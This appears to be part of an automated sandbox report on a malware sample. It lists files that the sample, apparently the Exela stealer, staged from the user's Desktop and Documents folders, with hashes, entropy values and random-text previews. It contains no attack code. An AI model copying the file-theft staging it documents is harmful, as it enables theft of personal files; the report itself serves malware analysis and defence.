                                                                                                                                                                                                                                  Preview:QNCYCDFIJJXXFOBBXUZWOFUQSSNNMFYIDILWLHTAZLHLJONMCDCVNCVXWBMUFJZAFKEEPNXZDYZJCSPOAMORBEETMACWAZGGTOXJCHTDTMVBHRPTLBCYZORACSZOXJZRVMZHVEOODGKJRRYLCKUFAYOXVKWJMPRNRNPZEPQZONIUXPPIZMRKSMXAPWYEFYYMMEVAXOVEZSPBEJXENHLIHXQMWJRNUJFILZBVCHZGSXSCZDLUJYAIEMFAKMGZRGVOACZDULPMTHUOBPJBMVYTDCJXFDPUECDSDSUEAFWGDFBMYZQEFBBNQHNIAZWLZMSUFKUWZABFJATHSHQHDIAVRZTRYPZQQLMBOTPFBQKJDTMNKBJAFYFAYVOMBSWHOBUQSYEBLHEDVKQNGPPYYDHQTDNFMKYJBWQRTHICJRWSTTREOOBMYGBUCHFDYMGHVLBDKHYWLYGTEDTHOSIOSXLWGESBKVKNDNLHUVLLUBIQJIAQTVGZHJBFRBPSLHGPZGCZVLETNOSXQRRSQJBXTKDASBHEZXYVHEIZXGANNJHMIMQYHDFNNALGZYXGCPYFPYZSCSPKUMVVWIRDXSMSGEKGZNWWWVXGTXWDKSTXVLHRXFELLCWRSIFVJLOUVSMBXWSHSPQZUHHYPANCFLOAYKMMBXMIXYFORAFUEVNVTQFWGSCJZEOHRNDHLLFYLQFOZXARKDDGYWBOFNOCUJWZALYSUEUOMQHCYTBHPYEDSSAKKDECQAZIWWHOJPIMNYUNNZPDBNECENBWFCTSDYUMRCXDFCNYFVTFUUWRGBGWUGZTYCTBQVNAVSKZCNNOJNXDSQUTVJLYJMHLQJJBPEDZOTOVFCJLUVQVIEYTFNEEDHKMXTEKAIHTQBGOPUGKWWNQTAGBHAUZVKMHWVZTYKYOWJYFEGCIPREWFGAHFXDMSFOAYRDJCTSGYNSDSELZDMIXRNFGOTYBEUKLAOAVMHJKZEBGSCQHGCDZCAAGIVBGWEQA

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\QNCYCDFIJJ.pdf

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                  Entropy (8bit):4.6980379859154695
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:A1cICRRGh4wXAyCbnhdKjiaeD+ICv1Ka42P:0cIYRGh4wXyny+VEV42P
                                                                                                                                                                                                                                  MD5:4E3F4BE1B97FA984F75F11D95B1C2602
                                                                                                                                                                                                                                  SHA1:C34EB2BF97AB4B0032A4BB92B9579B00514DC211
                                                                                                                                                                                                                                  SHA-256:59176791FFEBB86CD28FF283F163F0A44BEC33273968AADFF3852F383F07D1E1
                                                                                                                                                                                                                                  SHA-512:DD9C44C85AF10ED76900A2FE9289D28D99FB56CBE5385A46E485BE0F97A3EA7B119FE3235F334D84FA15902EA78F43C334424240B834D272849356421A33B207
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:QNCYCDFIJJXXFOBBXUZWOFUQSSNNMFYIDILWLHTAZLHLJONMCDCVNCVXWBMUFJZAFKEEPNXZDYZJCSPOAMORBEETMACWAZGGTOXJCHTDTMVBHRPTLBCYZORACSZOXJZRVMZHVEOODGKJRRYLCKUFAYOXVKWJMPRNRNPZEPQZONIUXPPIZMRKSMXAPWYEFYYMMEVAXOVEZSPBEJXENHLIHXQMWJRNUJFILZBVCHZGSXSCZDLUJYAIEMFAKMGZRGVOACZDULPMTHUOBPJBMVYTDCJXFDPUECDSDSUEAFWGDFBMYZQEFBBNQHNIAZWLZMSUFKUWZABFJATHSHQHDIAVRZTRYPZQQLMBOTPFBQKJDTMNKBJAFYFAYVOMBSWHOBUQSYEBLHEDVKQNGPPYYDHQTDNFMKYJBWQRTHICJRWSTTREOOBMYGBUCHFDYMGHVLBDKHYWLYGTEDTHOSIOSXLWGESBKVKNDNLHUVLLUBIQJIAQTVGZHJBFRBPSLHGPZGCZVLETNOSXQRRSQJBXTKDASBHEZXYVHEIZXGANNJHMIMQYHDFNNALGZYXGCPYFPYZSCSPKUMVVWIRDXSMSGEKGZNWWWVXGTXWDKSTXVLHRXFELLCWRSIFVJLOUVSMBXWSHSPQZUHHYPANCFLOAYKMMBXMIXYFORAFUEVNVTQFWGSCJZEOHRNDHLLFYLQFOZXARKDDGYWBOFNOCUJWZALYSUEUOMQHCYTBHPYEDSSAKKDECQAZIWWHOJPIMNYUNNZPDBNECENBWFCTSDYUMRCXDFCNYFVTFUUWRGBGWUGZTYCTBQVNAVSKZCNNOJNXDSQUTVJLYJMHLQJJBPEDZOTOVFCJLUVQVIEYTFNEEDHKMXTEKAIHTQBGOPUGKWWNQTAGBHAUZVKMHWVZTYKYOWJYFEGCIPREWFGAHFXDMSFOAYRDJCTSGYNSDSELZDMIXRNFGOTYBEUKLAOAVMHJKZEBGSCQHGCDZCAAGIVBGWEQA

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\QNCYCDFIJJ.xlsx

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                  Entropy (8bit):4.6980379859154695
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:A1cICRRGh4wXAyCbnhdKjiaeD+ICv1Ka42P:0cIYRGh4wXyny+VEV42P
                                                                                                                                                                                                                                  MD5:4E3F4BE1B97FA984F75F11D95B1C2602
                                                                                                                                                                                                                                  SHA1:C34EB2BF97AB4B0032A4BB92B9579B00514DC211
                                                                                                                                                                                                                                  SHA-256:59176791FFEBB86CD28FF283F163F0A44BEC33273968AADFF3852F383F07D1E1
                                                                                                                                                                                                                                  SHA-512:DD9C44C85AF10ED76900A2FE9289D28D99FB56CBE5385A46E485BE0F97A3EA7B119FE3235F334D84FA15902EA78F43C334424240B834D272849356421A33B207
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:QNCYCDFIJJXXFOBBXUZWOFUQSSNNMFYIDILWLHTAZLHLJONMCDCVNCVXWBMUFJZAFKEEPNXZDYZJCSPOAMORBEETMACWAZGGTOXJCHTDTMVBHRPTLBCYZORACSZOXJZRVMZHVEOODGKJRRYLCKUFAYOXVKWJMPRNRNPZEPQZONIUXPPIZMRKSMXAPWYEFYYMMEVAXOVEZSPBEJXENHLIHXQMWJRNUJFILZBVCHZGSXSCZDLUJYAIEMFAKMGZRGVOACZDULPMTHUOBPJBMVYTDCJXFDPUECDSDSUEAFWGDFBMYZQEFBBNQHNIAZWLZMSUFKUWZABFJATHSHQHDIAVRZTRYPZQQLMBOTPFBQKJDTMNKBJAFYFAYVOMBSWHOBUQSYEBLHEDVKQNGPPYYDHQTDNFMKYJBWQRTHICJRWSTTREOOBMYGBUCHFDYMGHVLBDKHYWLYGTEDTHOSIOSXLWGESBKVKNDNLHUVLLUBIQJIAQTVGZHJBFRBPSLHGPZGCZVLETNOSXQRRSQJBXTKDASBHEZXYVHEIZXGANNJHMIMQYHDFNNALGZYXGCPYFPYZSCSPKUMVVWIRDXSMSGEKGZNWWWVXGTXWDKSTXVLHRXFELLCWRSIFVJLOUVSMBXWSHSPQZUHHYPANCFLOAYKMMBXMIXYFORAFUEVNVTQFWGSCJZEOHRNDHLLFYLQFOZXARKDDGYWBOFNOCUJWZALYSUEUOMQHCYTBHPYEDSSAKKDECQAZIWWHOJPIMNYUNNZPDBNECENBWFCTSDYUMRCXDFCNYFVTFUUWRGBGWUGZTYCTBQVNAVSKZCNNOJNXDSQUTVJLYJMHLQJJBPEDZOTOVFCJLUVQVIEYTFNEEDHKMXTEKAIHTQBGOPUGKWWNQTAGBHAUZVKMHWVZTYKYOWJYFEGCIPREWFGAHFXDMSFOAYRDJCTSGYNSDSELZDMIXRNFGOTYBEUKLAOAVMHJKZEBGSCQHGCDZCAAGIVBGWEQA

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\SQSJKEBWDT.jpg

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                  Entropy (8bit):4.698473196318807
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:yRweZ+GANSA1E8ftV/VhmiY4WFk1Mu7mtKmj1KVVrsfmbG:abZ+X1E8lVNhmNA1P76KmxKamK
                                                                                                                                                                                                                                  MD5:4D0D308F391353530363283961DF2C54
                                                                                                                                                                                                                                  SHA1:59DC2A289D6AB91E0CBD287A0F1D47E29BAE0C07
                                                                                                                                                                                                                                  SHA-256:6D4D77F7AD924168358F449E995C13B1072F06F7D8A464C232E643E2BD4DFF09
                                                                                                                                                                                                                                  SHA-512:DBF8C59E10706B4E220A6F15ADF4E4BAC5271F9477A5C32F8C61943A0A9318D50AD1A2E00E2BDF49DBA842B603545C49F9C36698802B3CDFE1F51FEC0C214B7A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:SQSJKEBWDTQPYRJUMTXHILYOMMANPJPHHMRHFVWTZEPXAIAVKTSBZRYUTWHNFQIECJFXGKPUTVPJATJGMKUHXJODTESNRMMJTXWENSGOWPBKXVHEEJMAGWUGYELOFGDDMEXBMBPCQOZDIQJHWWTSSVNGZLVHCHBZNJSYUOTWAPZJKFXWFCXQUQCBQYKVYKKKLNXSSSSLGTAFUMEJNHNRUGIMMETQDZKJCJZPRVXTSJLLHAUIPPNLEBPEUBCKHAPQUFAGPBYQCGICNBXZSXWAJNTKCUOBGQDHMCHIJBTKFTHSCPEBQXTOJKUAWTWRXEPYUIVUBKOGJQVRNBCCKFIMUIRPTIPNOIKNYUBFQMLTBCEFKXWKFTLKOEFALEANNDBOMFEYCLJVLOGSDFYCVBHQLAHJAEUYVZUKKYJAFJZPGGRXWJYMLQJGLJJPLVWQZTEJZVFZAIXBTWSNPXWYEWJSPNEXNORNZGESIRMDWDAAOUYCCNJQHBKTFVBSDSYVEQCQSBURVVYQIWJIGTJQDEZYGUHFKDWPAZGTXJFCGXCCHSPAITPOYIKUIZLMXTHWETVEIEWMJFHZRXBWPEKERORJFPHCCESXPZRWMEWGFCALFMDGOIEYAUSWWMBCHUQFBDJAZGNOFCHHPWSPGMHXGUSYBEKNZGGOHLEYLHJOUACYWSDKSJOOWHEPLCCKEWYVGVDSYJISOXMVCTJOSETWHUFBVDRYYAHSNIHPIRACNMMCDXLNSSFMVYGREIDELWCRHNKSOHQZMWMXEQMSXGXGWJQEDVLZMOLCVOBDXALQOHTEQUQCXKBTZHLAPBTYYAAPCTPIOGNQTMUINQRWRUZPUNQRXBMEDXPKAFCNTHZHZNOSMHOZZDSRACZMUSFUZGUJWIHKQKPTYZQWGZAUVTCZBLLEBGRXXRHNYNRCEMXSYIJTSCGAJZWVATKNNHCIBGACCGABGJJVWJDJTYOTKQWITZPWLFTBKVEPEVHMSUDPVSVB

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\SQSJKEBWDT.mp3

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                  Entropy (8bit):4.698473196318807
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:yRweZ+GANSA1E8ftV/VhmiY4WFk1Mu7mtKmj1KVVrsfmbG:abZ+X1E8lVNhmNA1P76KmxKamK
                                                                                                                                                                                                                                  MD5:4D0D308F391353530363283961DF2C54
                                                                                                                                                                                                                                  SHA1:59DC2A289D6AB91E0CBD287A0F1D47E29BAE0C07
                                                                                                                                                                                                                                  SHA-256:6D4D77F7AD924168358F449E995C13B1072F06F7D8A464C232E643E2BD4DFF09
                                                                                                                                                                                                                                  SHA-512:DBF8C59E10706B4E220A6F15ADF4E4BAC5271F9477A5C32F8C61943A0A9318D50AD1A2E00E2BDF49DBA842B603545C49F9C36698802B3CDFE1F51FEC0C214B7A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:SQSJKEBWDTQPYRJUMTXHILYOMMANPJPHHMRHFVWTZEPXAIAVKTSBZRYUTWHNFQIECJFXGKPUTVPJATJGMKUHXJODTESNRMMJTXWENSGOWPBKXVHEEJMAGWUGYELOFGDDMEXBMBPCQOZDIQJHWWTSSVNGZLVHCHBZNJSYUOTWAPZJKFXWFCXQUQCBQYKVYKKKLNXSSSSLGTAFUMEJNHNRUGIMMETQDZKJCJZPRVXTSJLLHAUIPPNLEBPEUBCKHAPQUFAGPBYQCGICNBXZSXWAJNTKCUOBGQDHMCHIJBTKFTHSCPEBQXTOJKUAWTWRXEPYUIVUBKOGJQVRNBCCKFIMUIRPTIPNOIKNYUBFQMLTBCEFKXWKFTLKOEFALEANNDBOMFEYCLJVLOGSDFYCVBHQLAHJAEUYVZUKKYJAFJZPGGRXWJYMLQJGLJJPLVWQZTEJZVFZAIXBTWSNPXWYEWJSPNEXNORNZGESIRMDWDAAOUYCCNJQHBKTFVBSDSYVEQCQSBURVVYQIWJIGTJQDEZYGUHFKDWPAZGTXJFCGXCCHSPAITPOYIKUIZLMXTHWETVEIEWMJFHZRXBWPEKERORJFPHCCESXPZRWMEWGFCALFMDGOIEYAUSWWMBCHUQFBDJAZGNOFCHHPWSPGMHXGUSYBEKNZGGOHLEYLHJOUACYWSDKSJOOWHEPLCCKEWYVGVDSYJISOXMVCTJOSETWHUFBVDRYYAHSNIHPIRACNMMCDXLNSSFMVYGREIDELWCRHNKSOHQZMWMXEQMSXGXGWJQEDVLZMOLCVOBDXALQOHTEQUQCXKBTZHLAPBTYYAAPCTPIOGNQTMUINQRWRUZPUNQRXBMEDXPKAFCNTHZHZNOSMHOZZDSRACZMUSFUZGUJWIHKQKPTYZQWGZAUVTCZBLLEBGRXXRHNYNRCEMXSYIJTSCGAJZWVATKNNHCIBGACCGABGJJVWJDJTYOTKQWITZPWLFTBKVEPEVHMSUDPVSVB

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\SUAVTZKNFL.pdf

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                  Entropy (8bit):4.69422273140364
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
                                                                                                                                                                                                                                  MD5:A686C2E2230002C3810CB3638589BF01
                                                                                                                                                                                                                                  SHA1:4B764DD14070E52A2AC0458F401CDD5724E714FB
                                                                                                                                                                                                                                  SHA-256:38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
                                                                                                                                                                                                                                  SHA-512:1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:SUAVTZKNFLPDUIKIPSQJDVGAPGXKDOHYHNOWHLTUYHUBPZNAGHXWSRGELNTTLWSOVKHBKQEKGENMQDFUYQEFPUMFVGFHNHBEYAAJVHSIYLSLGVZSSKYNEFOJGJXPWCGXOBRZVXDWDDKKLDGWVLNCMOJKBSBYFMTKILZOONEGLZWORUNOTXJNOTGXQTUBOXEFHVICNNYYHMRGCLTZLWQODATYJZBGFVEMSABDUIKNKVRGQOHHCSHZAJIYWZLGGZOOEOQBTEAFTXBQJIHRZBDRPFDGHVFGYZEIHFYVBPAXJYSLOTRVHEFEEWXUGJCOLFXEKSPFHBKQEHGPZADNNCAUYCTEDLFKZMZOQOADUCTDIOYKELVKGABHEMOSAYPWUUKTZHQNEQWLFATTPCULHLMBMEQVAXDFQNQLMLVOFTUTWLMJNLVNCRHTWUTJEEORGWISXALHDTNXRCWVMZRUEMSVOJYMENRHGVXXMGLOWYRFKZLPBZQMETPESMZPCJGYXVQSMCJXYEMMNKLPIXGOXOMQNYCFAEVPXDGOFEGSLWKBUOLRKXGTWDFUVGYFTOWQZAOIMQUZEELMCQWKUBEWGFDVXSXNGHPJNVDQHMPSSIFZTQLVBBHZOEGNPDAWAYLIRBWZHXRAXBBESYNRIRINAKLQMELNYRHRPKDBUCNSZOVHNTBCUYDQTGFWZJUCUZBHHXHQHKWOWTEWLUGGGWHIHCWZLLJPDFVDICZBBLFSECTLMQBKCPCHANOICKIUSVAJTYQOIUWRGVAFOFTMIHARUUCNGBLVFIKMTTGPYXNEVGLPMZDMIQDQOLIEFHNZYMZTCDOHBNQLNVLXRUXMGYCVOJDBWPSJKMFMEDBEMXULQBRVRKPYNUACCXNPGFEMPXDXNEIPTKGSKUMVFSLCTJFHNFATCDKSZWKYMVQNTVHCOAJXDUTJZESFLKTQOGREXBTBVBGLDYJYDTNEAQDFRTXMJIHJCCTPUDZLNKNEABFQYCDL

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\ZQIXMVQGAH.jpg

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                  Entropy (8bit):4.702263764575455
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:QUkKzRRr64jMMhcqBDi9yWJqsBFhli3VZ6i0:QUkCe4j/hI9yWJnvi3Vf0
                                                                                                                                                                                                                                  MD5:1680F18135FD9FE517865D4B70BCA69F
                                                                                                                                                                                                                                  SHA1:CE72CFB81AB690709C2C5BBF40348F829C87813B
                                                                                                                                                                                                                                  SHA-256:0F4384BA6CC62588912ACEBE97E6E00A03D1145AFAF38BDE22023CA303B22CA0
                                                                                                                                                                                                                                  SHA-512:E63A46F382399DE9A52F82325302CCFF8184246D4A126EDCC98283B6CBC77D4330A01A704BA4E29144A2A37D6E06F9AF22383A00ACC2394E827DC97748171585
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:ZQIXMVQGAHDITDJZGGBRVMLECQSWORTZSLVRPVEGPWPVZTSCUAAOZEHEMQBFXYQHAHJZSDLBFWCHSGHULCPYSYSQXRZJWEBIQXUUBQWRWTEIEYXQNQSWSIFSZRCKKPIEMFCPWGUCQQMTSHZBSZVTRBPCPEJUOTTXWFTZMIACKGYGCKGMCSBDEWSYMPFVNOOLZEARTYUPCWTOBACIPWHFPWORDPLQMNLMUZNAKOQVSKHKIFLPCYEHDDRRDQOYCYQVULYYOTKIZPSPBGJRCSTMNKECWGATNMXDLHHCEVMIAXORCUUBFYRDSANZMOGABCQIQLFHTBGKKNPDKITRXVRKSKNVGMYCWRZQDVIMHLJLZRTYAAEHTNREDULDCWBSZMMNIANUNAFOGWCASXNKHREAUCUWLFKPTBHSSBGWNPWTUBBQMZWBLBJUGDBYRIMWQJRPSOWJXAJGBKZNEPJRNRYUSGQVPTEMKUOEFNAJOSUDQYVKPUJCZGEGCSKJLVBNJUHWENWOTATKRZDPPHLZRTEDRFFPOSXJYWZGCANYHHLHXXVTSSYPKKRRPYFRZWPUNTSEFRSCUYISMVFYBIPXTBGXLELYMXPWVIFHICARYLACSUYONWBWTORCZTHJFSTTFVOFCJFCNAETZOVMYJPCQMLJESIRJYXODJQXZDNJABIYMTRLKATOAVVXTUZSVSRMUIPQSCLFLDHXPUIRKARFNWIVJCRHDPDVWJMVIMIYEVDEIYZXDMZFAKSSTYCAXXIWXKFLTNQLSXXZMPIQZYDSHVASWFVUHVXSYXSNAYZOGEQZXYDMZBHUZSYGXGRDAZTEOKPXEATMDEMGOQLFIBNDPAXRWXZXMBHAXSODDRKSUOGIMMNADLIRGHDFDTKKQAFWAYTUNQJNECGAKAPULJFXENSHPMQGUWBJJTPVTDADKCEVKGQOXSCANLNQNJAWKDBVBIWICEASXDEHDCNCUIOBUKTINVKEPNITJZRLWNHBVANB

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\ZQIXMVQGAH.xlsx

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                  Entropy (8bit):4.702263764575455
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:QUkKzRRr64jMMhcqBDi9yWJqsBFhli3VZ6i0:QUkCe4j/hI9yWJnvi3Vf0
                                                                                                                                                                                                                                  MD5:1680F18135FD9FE517865D4B70BCA69F
                                                                                                                                                                                                                                  SHA1:CE72CFB81AB690709C2C5BBF40348F829C87813B
                                                                                                                                                                                                                                  SHA-256:0F4384BA6CC62588912ACEBE97E6E00A03D1145AFAF38BDE22023CA303B22CA0
                                                                                                                                                                                                                                  SHA-512:E63A46F382399DE9A52F82325302CCFF8184246D4A126EDCC98283B6CBC77D4330A01A704BA4E29144A2A37D6E06F9AF22383A00ACC2394E827DC97748171585
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:ZQIXMVQGAHDITDJZGGBRVMLECQSWORTZSLVRPVEGPWPVZTSCUAAOZEHEMQBFXYQHAHJZSDLBFWCHSGHULCPYSYSQXRZJWEBIQXUUBQWRWTEIEYXQNQSWSIFSZRCKKPIEMFCPWGUCQQMTSHZBSZVTRBPCPEJUOTTXWFTZMIACKGYGCKGMCSBDEWSYMPFVNOOLZEARTYUPCWTOBACIPWHFPWORDPLQMNLMUZNAKOQVSKHKIFLPCYEHDDRRDQOYCYQVULYYOTKIZPSPBGJRCSTMNKECWGATNMXDLHHCEVMIAXORCUUBFYRDSANZMOGABCQIQLFHTBGKKNPDKITRXVRKSKNVGMYCWRZQDVIMHLJLZRTYAAEHTNREDULDCWBSZMMNIANUNAFOGWCASXNKHREAUCUWLFKPTBHSSBGWNPWTUBBQMZWBLBJUGDBYRIMWQJRPSOWJXAJGBKZNEPJRNRYUSGQVPTEMKUOEFNAJOSUDQYVKPUJCZGEGCSKJLVBNJUHWENWOTATKRZDPPHLZRTEDRFFPOSXJYWZGCANYHHLHXXVTSSYPKKRRPYFRZWPUNTSEFRSCUYISMVFYBIPXTBGXLELYMXPWVIFHICARYLACSUYONWBWTORCZTHJFSTTFVOFCJFCNAETZOVMYJPCQMLJESIRJYXODJQXZDNJABIYMTRLKATOAVVXTUZSVSRMUIPQSCLFLDHXPUIRKARFNWIVJCRHDPDVWJMVIMIYEVDEIYZXDMZFAKSSTYCAXXIWXKFLTNQLSXXZMPIQZYDSHVASWFVUHVXSYXSNAYZOGEQZXYDMZBHUZSYGXGRDAZTEOKPXEATMDEMGOQLFIBNDPAXRWXZXMBHAXSODDRKSUOGIMMNADLIRGHDFDTKKQAFWAYTUNQJNECGAKAPULJFXENSHPMQGUWBJJTPVTDADKCEVKGQOXSCANLNQNJAWKDBVBIWICEASXDEHDCNCUIOBUKTINVKEPNITJZRLWNHBVANB

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\EFOYFBOLXA.png

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                  Entropy (8bit):4.696178193607948
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                                                                                                                                                                                                  MD5:960ECA5919CC00E1B4542A6E039F413E
                                                                                                                                                                                                                                  SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                                                                                                                                                                                                  SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                                                                                                                                                                                                  SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\GAOBCVIQIJ.png

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                  Entropy (8bit):4.701188456968639
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:hm3LKgBsTCBI602KGM6Fnd0F02s0LTz4+A7wXBjb9gPY14fmfdBH159l7TZzRQTJ:4mg9IFPGM6OtPc++wXBbV14e71zwv
                                                                                                                                                                                                                                  MD5:18A3248DC9C539CCD2C8419D200F1C4D
                                                                                                                                                                                                                                  SHA1:3B2CEE87F3426C4A08959E9861D274663420215C
                                                                                                                                                                                                                                  SHA-256:27D6BAB3FFA19534FF008BDBC5FF07BE94BA08C909222D5AD4802C4C9E10153E
                                                                                                                                                                                                                                  SHA-512:F8176C814016D4962693A55A84D2BCC26EE01DE822E76B3D3A6B0ADD48382F8D76B5576742BBCAD16A7779C602B435150C0EBDDE1B1ECBFFD6702ECEFE87133B
                                                                                                                                                                                                                                  Malicious:false
